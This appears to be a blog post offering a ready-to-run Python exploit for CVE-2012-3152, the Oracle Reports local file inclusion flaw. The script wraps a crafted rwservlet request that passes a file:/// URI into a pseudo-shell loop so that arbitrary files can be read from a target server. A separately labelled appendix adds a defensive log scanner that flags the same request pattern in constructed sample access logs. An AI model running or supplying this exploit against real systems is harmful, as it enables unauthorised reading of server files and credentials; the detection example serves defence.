This quick snippet of code exploits CVE-2012-3152, the Oracle Reports Local File Inclusion (LFI) vulnerability. To make it easier to interact with the vulnerable system, the HTTP request exploiting the LFI is wrapped in an endless loop that feels like a command prompt. Here is a good write-up on the actual vulnerability. For this script we threw in a dash of color to the shell-like output using the Python module “termcolor” (download here).


#!/usr/bin/python
import sys, urllib2    # Import the required modules for the vulnerability
from termcolor import colored   # Need to download python module "termcolor"

if len(sys.argv) != 2:    # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>"
  print "Usage: "+sys.argv[0]+" <URL>"
  sys.exit(0)

URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI"

while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  resource=raw_input(colored("~$ ", "red"))
  req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"'
  try:                    # Sets up a try/except block so exceptions are handled cleanly
    response=urllib2.urlopen(URL+req)
    # Sends request and prints the response
    for line in response.readlines():
      print line.strip()
  except Exception as e: print e
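
For the detection side, the following is an added example, not part of the original script: it scans web access-log lines for the request shape the script sends (rwservlet with a URLPARAMETER that is a file: URI). The log lines, IP addresses and file paths are constructed samples, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

SERVLET = "/reports/rwservlet"
# URLPARAMETER value, optionally wrapped in quotes or log-escaped quotes (\"),
# captured up to the next quote, backslash, separator or whitespace.
URLPARAM_RE = re.compile(r'urlparameter=[\\"\']*(?P<uri>file:[^\s"\'\\&+]*)', re.I)

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so encoded or double-encoded requests are normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_file_scheme_requests(log_lines):
    """Return (line_no, client, uri) for rwservlet requests whose URLPARAMETER is a file: URI."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        decoded = fully_decode(line)
        if SERVLET not in decoded.lower():
            continue                      # not the Oracle Reports servlet
        match = URLPARAM_RE.search(decoded)
        if match:
            client = line.split(" ", 1)[0]  # first field of a common-format log line
            hits.append((line_no, client, match.group("uri")))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=\"file:///constructed/sample.txt\" HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /reports/rwservlet?report=test.rdf+JOBTYPE=rwurl+urlparameter=%22file%3A%2F%2F%2Fconstructed%2Fsample2.txt%22 HTTP/1.1" 200 640
192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /reports/rwservlet?report=sales.rdf+desformat=pdf+destype=cache HTTP/1.1" 200 90210
192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /reports/rwservlet?report=test.rdf+JOBTYPE=rwurl+URLPARAMETER=\"http://intranet.example/page\" HTTP/1.1" 200 300
203.0.113.5 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
'''.strip().splitlines()

if __name__ == "__main__":
    for line_no, client, uri in find_file_scheme_requests(SAMPLE_LOG):
        print(f"line {line_no}: {client} requested {uri} via rwservlet")
```

Only the first two sample lines are reported; the ordinary report request, the rwurl request with an http: URL, and the unrelated page are left alone.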
